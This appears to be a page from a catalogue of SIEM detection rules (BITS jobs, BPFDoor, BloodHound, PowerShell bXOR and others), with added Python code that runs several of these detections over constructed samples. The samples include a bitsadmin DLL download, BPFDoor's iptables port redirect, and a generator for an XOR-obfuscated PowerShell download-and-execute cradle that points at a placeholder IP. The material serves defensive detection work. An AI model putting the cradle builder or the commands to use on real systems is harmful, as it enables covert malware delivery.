EXPLORE DETECTIONS
Bitbucket User Details Export Attempt Detected
Detects user data export activity.
Bitbucket User Login Failure
Detects user authentication failure events. Please note that this rule can be noisy; it is recommended to use it with a correlation based on the "author.name" field (e.g. many failures for the same user in a short window).
Bitbucket User Login Failure Via SSH
Detects SSH user login access failures. Please note that this rule can be noisy; it is recommended to use it with a correlation based on the "author.name" field.
Bitbucket User Permissions Export Attempt
Detects user permission data export attempt.
Bitlocker Key Retrieval
Monitors and alerts on BitLocker key retrieval events. A retrieved key unlocks the encrypted volume, so reads outside of normal help-desk recovery workflows should be investigated.
BitLockerTogo.EXE Execution
Detects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption for removable data drives. This feature covers the encryption of USB flash drives, SD cards, external hard disk drives and other drives formatted with the NTFS, FAT16, FAT32 or exFAT file system. This is a rarely used application, and any usage of it is worth investigating. Malware such as the Lumma stealer has been seen using this process as a target for process hollowing.
BITS Client BitsProxy DLL Loaded By Uncommon Process
Detects an uncommon process loading "BitsProxy.dll". This DLL is loaded when the BITS COM instance or API is used, so the detection can be used to hunt for uncommon processes loading it in your environment, which may indicate suspicious activity.
BITS Transfer Job Download From Direct IP
Detects a BITS transfer job downloading file(s) from a direct IP address.
BITS Transfer Job Download From File Sharing Domains
Detects BITS transfer job downloading files from a file sharing domain.
BITS Transfer Job Download To Potential Suspicious Folder
Detects a new BITS transfer job where the LocalName (the saved file) is stored in a potentially suspicious location.
BITS Transfer Job Downloading File Potential Suspicious Extension
Detects a new BITS transfer job saving a local file with a potentially suspicious extension.
BITS Transfer Job With Uncommon Or Suspicious Remote TLD
Detects a suspicious download using the BITS client from an FQDN with an uncommon or suspicious top-level domain. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.
Bitsadmin to Uncommon IP Server Address
Detects Bitsadmin connections to IP addresses instead of FQDNs.
Bitsadmin to Uncommon TLD
Detects Bitsadmin connections to domains with uncommon TLDs.
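The BITS rules above (direct IP, file-sharing domain, suspicious folder, suspicious extension, uncommon TLD) and the two Bitsadmin command-line rules all apply the same handful of checks to a remote URL and a local path. The following Python is an added example, not code from the page or from any Sigma rule: it runs those checks over constructed records shaped like the RemoteName/LocalName fields of the Microsoft-Windows-Bits-Client/Operational log and over a constructed bitsadmin.exe command line. The reference lists (file-sharing domains, common TLDs, suspicious folders and extensions) are short illustrative assumptions; the real rules carry their own, longer lists.

```python
import re
import ipaddress
from urllib.parse import urlparse

# Illustrative reference data (assumption): the real rules ship longer lists.
FILE_SHARING_DOMAINS = {
    "transfer.sh", "anonfiles.com", "mega.nz", "pastebin.com",
    "file.io", "gofile.io", "cdn.discordapp.com",
}
COMMON_TLDS = {"com", "net", "org", "edu", "gov", "mil", "io", "de", "uk", "fr", "jp", "us"}
SUSPICIOUS_EXTENSIONS = (".exe", ".dll", ".ps1", ".vbs", ".bat", ".cmd", ".hta", ".js", ".scr", ".msi")
SUSPICIOUS_FOLDERS = ("\\users\\public\\", "\\windows\\temp\\", "\\appdata\\local\\temp\\",
                      "\\programdata\\", "\\perflogs\\", "\\temp\\")

# Constructed sample records (not real telemetry), shaped like the job fields of
# Bits-Client/Operational events: job name, remote URL, local destination file.
SAMPLE_EVENTS = [
    {"name": "WU", "RemoteName": "https://download.windowsupdate.com/c/x.cab",
     "LocalName": "C:\\Windows\\SoftwareDistribution\\Download\\x.cab"},
    {"name": "job1", "RemoteName": "http://203.0.113.7:8080/payload.exe",
     "LocalName": "C:\\Users\\Public\\payload.exe"},
    {"name": "job2", "RemoteName": "https://transfer.sh/abc/doc.pdf",
     "LocalName": "C:\\Users\\bob\\Downloads\\doc.pdf"},
    {"name": "job3", "RemoteName": "https://cdn.example.xyz/loader.ps1",
     "LocalName": "C:\\ProgramData\\loader.ps1"},
]
# Constructed process-creation command line for the Bitsadmin variants of the rules.
SAMPLE_BITSADMIN = ("C:\\Windows\\System32\\bitsadmin.exe /transfer dl /download /priority high "
                    "http://203.0.113.7/a.dll C:\\Windows\\Temp\\a.dll")

URL_RE = re.compile(r"https?://\S+", re.I)
WINPATH_RE = re.compile(r"[a-z]:\\\S+", re.I)


def analyze_transfer(remote_name: str, local_name: str) -> list:
    """Return the names of the checks that fire for one BITS transfer."""
    findings = []
    host = (urlparse(remote_name).hostname or "").lower()
    local = local_name.lower()

    try:
        ipaddress.ip_address(host)          # literal IPv4/IPv6 address instead of an FQDN
        findings.append("direct_ip")
    except ValueError:
        # Domain-based checks only make sense when the host really is an FQDN.
        if any(host == d or host.endswith("." + d) for d in FILE_SHARING_DOMAINS):
            findings.append("file_sharing_domain")
        if host and host.rsplit(".", 1)[-1] not in COMMON_TLDS:
            findings.append("uncommon_tld")

    if any(folder in local for folder in SUSPICIOUS_FOLDERS):
        findings.append("suspicious_folder")
    if local.endswith(SUSPICIOUS_EXTENSIONS):
        findings.append("suspicious_extension")
    return findings


def triage(events) -> dict:
    """Map each job name to the checks it triggers."""
    return {e["name"]: analyze_transfer(e["RemoteName"], e["LocalName"]) for e in events}


def analyze_bitsadmin_cmdline(cmdline: str) -> list:
    """Apply the same checks to a bitsadmin.exe command line.

    The remote URL is the first http(s) token; for /transfer the destination
    path is the last Windows path on the line (the first may be bitsadmin.exe itself).
    """
    url = URL_RE.search(cmdline)
    if not url:
        return []
    paths = WINPATH_RE.findall(cmdline)
    return analyze_transfer(url.group(0), paths[-1] if paths else "")


if __name__ == "__main__":
    for name, hits in triage(SAMPLE_EVENTS).items():
        print(f"{name:5} {hits or 'clean'}")
    print("bitsadmin", analyze_bitsadmin_cmdline(SAMPLE_BITSADMIN))
```

Note that job2 fires both the file-sharing and the uncommon-TLD check: the rules overlap by design, and a job that trips several of them at once (job1, job3) is the one to look at first.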
BloodHound Collection Files
Detects the default output file names produced by SharpHound, the BloodHound collection tool.
Boot Configuration Tampering Via Bcdedit.EXE
Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often used by malware or attackers as a destructive step (for example, disabling recovery options) before launching ransomware.
BPFDoor Abnormal Process ID or Lock File Accessed
Detects access to BPFDoor ".lock" and ".pid" files in temporary file storage directories.
Bpfdoor TCP Ports Redirect
All TCP traffic on a particular port from the attacker's host is redirected to a different port, e.g. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'. The traffic looks like encrypted SSH communication going to TCP port 22, but is in fact directed to the shell port once it hits the iptables rule, which applies to the attacker's host only.
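The redirect above shows up in auditd as an EXECVE record for iptables. The Python below is an added example (not code from the page or from the Sigma rule): it rebuilds argv from constructed auditd EXECVE lines, including auditd's hex encoding of arguments that contain spaces, and flags a nat/PREROUTING rule that redirects a source-restricted port to another port, whether the rule is being added or, as BPFDoor does on cleanup, deleted. The sample lines are constructed, not a real capture; the decision to require a "-s" source is taken from the description, and relaxing it is a tuning choice noted in the code.

```python
import os
import re
from typing import Optional

# auditd writes EXECVE arguments quoted, or hex-encoded (a3=2F746D70...) when they
# contain spaces or control characters.
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')
IPTABLES_NAMES = {"iptables", "iptables-legacy", "iptables-nft"}
VALUE_FLAGS = {"-t", "-p", "-s", "--source", "--dport", "--destination-port",
               "-j", "--to-ports", "-A", "-I", "-D"}
ACTIONS = {"-A": "append", "-I": "insert", "-D": "delete"}

# Constructed auditd lines (not a real capture): a BPFDoor-style redirect being
# installed, an unrelated NAT rule, and the same redirect being removed later.
SAMPLE_AUDIT_LINES = [
    'type=EXECVE msg=audit(1650000000.101:4001): argc=15 a0="/sbin/iptables" a1="-t" a2="nat" '
    'a3="-A" a4="PREROUTING" a5="-p" a6="tcp" a7="-s" a8="192.168.1.1" a9="--dport" a10="22" '
    'a11="-j" a12="REDIRECT" a13="--to-ports" a14="42392"',
    'type=EXECVE msg=audit(1650000000.102:4002): argc=9 a0="/usr/sbin/iptables" a1="-t" a2="nat" '
    'a3="-A" a4="POSTROUTING" a5="-s" a6="172.17.0.0/16" a7="-j" a8="MASQUERADE"',
    'type=EXECVE msg=audit(1650000900.300:4188): argc=15 a0="/sbin/iptables" a1="-t" a2="nat" '
    'a3="-D" a4="PREROUTING" a5="-p" a6="tcp" a7="-s" a8="192.168.1.1" a9="--dport" a10="22" '
    'a11="-j" a12="REDIRECT" a13="--to-ports" a14="42392"',
]


def parse_execve_argv(line: str) -> list:
    """Rebuild argv from an auditd EXECVE record, decoding hex-encoded arguments."""
    args = {}
    for idx, quoted, hexed in ARG_RE.findall(line):
        args[int(idx)] = quoted if quoted else bytes.fromhex(hexed).decode("utf-8", "replace")
    return [args[i] for i in sorted(args)]


def argv_to_opts(argv: list) -> dict:
    """Fold an iptables argv into a flag -> value map (valueless flags map to True)."""
    opts, i = {}, 1
    while i < len(argv):
        tok = argv[i]
        if tok in VALUE_FLAGS and i + 1 < len(argv):
            opts[tok] = argv[i + 1]
            i += 2
        else:
            opts[tok] = True
            i += 1
    return opts


def check_bpfdoor_redirect(argv: list) -> Optional[dict]:
    """Flag 'iptables -t nat {-A|-I|-D} PREROUTING ... -s <host> ... -j REDIRECT --to-ports N'.

    The -s restriction distinguishes BPFDoor's per-attacker redirect from a transparent
    proxy rule that redirects everyone; dropping it widens coverage at the cost of noise.
    """
    if not argv or os.path.basename(argv[0]) not in IPTABLES_NAMES:
        return None
    opts = argv_to_opts(argv)
    action = next((a for a in ACTIONS if a in opts), None)
    if action is None or opts.get(action) != "PREROUTING":
        return None
    if opts.get("-t") != "nat" or opts.get("-j") != "REDIRECT":
        return None
    source = opts.get("-s") or opts.get("--source")
    if not source:
        return None
    return {
        "action": ACTIONS[action],
        "source": source,
        "dport": opts.get("--dport") or opts.get("--destination-port"),
        "to_ports": opts.get("--to-ports"),
    }


def scan_audit_log(lines) -> list:
    """Run the check over EXECVE records; one finding per matching iptables invocation."""
    findings = []
    for line in lines:
        if "type=EXECVE" not in line:
            continue
        hit = check_bpfdoor_redirect(parse_execve_argv(line))
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for hit in scan_audit_log(SAMPLE_AUDIT_LINES):
        print(hit)
```

EXECVE records only exist if execve is audited, e.g. with the audit rule `-a always,exit -F arch=b64 -S execve -k exec` (and the b32 equivalent); without it the iptables invocation never reaches the log and the rule has nothing to match.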
BPFtrace Unsafe Option Usage
Detects usage of the bpftrace "--unsafe" option, which enables unsafe builtins such as system().
Browser Execution In Headless Mode
Detects execution of a Chromium-based browser in headless mode.
Browser Started with Remote Debugging
Detects browsers starting with remote debugging flags, a technique often used to perform browser injection attacks.
Buffer Overflow Attempts
Detects buffer overflow attempts in Unix system log files
Bulk Deletion Changes To Privileged Account Permissions
Detects when a user is removed from a privileged role. Bulk changes should be investigated.
bXOR Operator Usage In PowerShell Command Line - PowerShell Classic
Detects PowerShell executions that make use of the bxor (bitwise XOR) operator. Attackers might use it as an alternative obfuscation method to Base64-encoded commands. Investigate the CommandLine and process tree to determine whether the activity is malicious.
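To show what this rule fires on and how an analyst triages the hit, the Python below is an added example (not code from the page or from the Sigma rule). It builds the kind of XOR-obfuscated one-liner an attacker would run, applies the rule's core match (any "-bxor" in the command line), and, where the command line carries both a literal byte array and a literal key, recovers the payload; a legitimate arithmetic use of -bxor still matches but cannot be decoded, which is exactly the case the description says to investigate by hand. The sample command lines are constructed, and the "HostApplication" field name they imitate is the one PowerShell Classic logging (event ID 400/800) populates.

```python
import re

BXOR_RE = re.compile(r"-bxor\b", re.I)
KEY_RE = re.compile(r"-bxor\s+(0x[0-9a-f]+|\d+)", re.I)   # literal key, decimal or hex
ARRAY_RE = re.compile(r"@\(\s*([0-9][0-9,\s]*)\)")         # PowerShell literal array @(1,2,3)


def xor_obfuscate(plaintext: str, key: int) -> str:
    """Constructed attacker-side example: XOR every character and decode at runtime with -bxor."""
    nums = ",".join(str(ord(c) ^ key) for c in plaintext)
    return (f'powershell.exe -nop -w hidden -c "$b=@({nums});'
            f'$s=-join($b|%{{[char]($_ -bxor {key:#x})}});iex $s"')


def is_bxor_hit(command_line: str) -> bool:
    """The rule's core logic: any -bxor operator in the command line."""
    return BXOR_RE.search(command_line) is not None


def try_decode(command_line: str):
    """Triage helper: recover the payload when both the byte array and the key are
    literals in the command line; return None otherwise (manual review needed)."""
    key_m, arr_m = KEY_RE.search(command_line), ARRAY_RE.search(command_line)
    if not (key_m and arr_m):
        return None
    key = int(key_m.group(1), 0)
    values = [int(n) for n in re.split(r"[,\s]+", arr_m.group(1).strip()) if n]
    return "".join(chr(v ^ key) for v in values)


# Constructed command lines shaped like the HostApplication field of EID 400/800.
SAMPLE_COMMAND_LINES = [
    xor_obfuscate("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')", 0x41),
    'powershell.exe -c "$crc = $crc -bxor $chunk"',   # legitimate arithmetic use: hit, no decode
    'powershell.exe -EncodedCommand SQBFAFgA',         # Base64 variant: other rules cover this
]


def triage(command_lines) -> list:
    """For each command line: (rule fired?, decoded payload or None)."""
    return [(is_bxor_hit(c), try_decode(c)) for c in command_lines]


if __name__ == "__main__":
    for cmd, (hit, decoded) in zip(SAMPLE_COMMAND_LINES, triage(SAMPLE_COMMAND_LINES)):
        print(hit, repr(decoded), cmd[:60])
```

A match without a decodable payload is not a false positive by itself: the key may be computed at runtime or the bytes may come from a file, so the process tree and the parent that launched PowerShell decide the call.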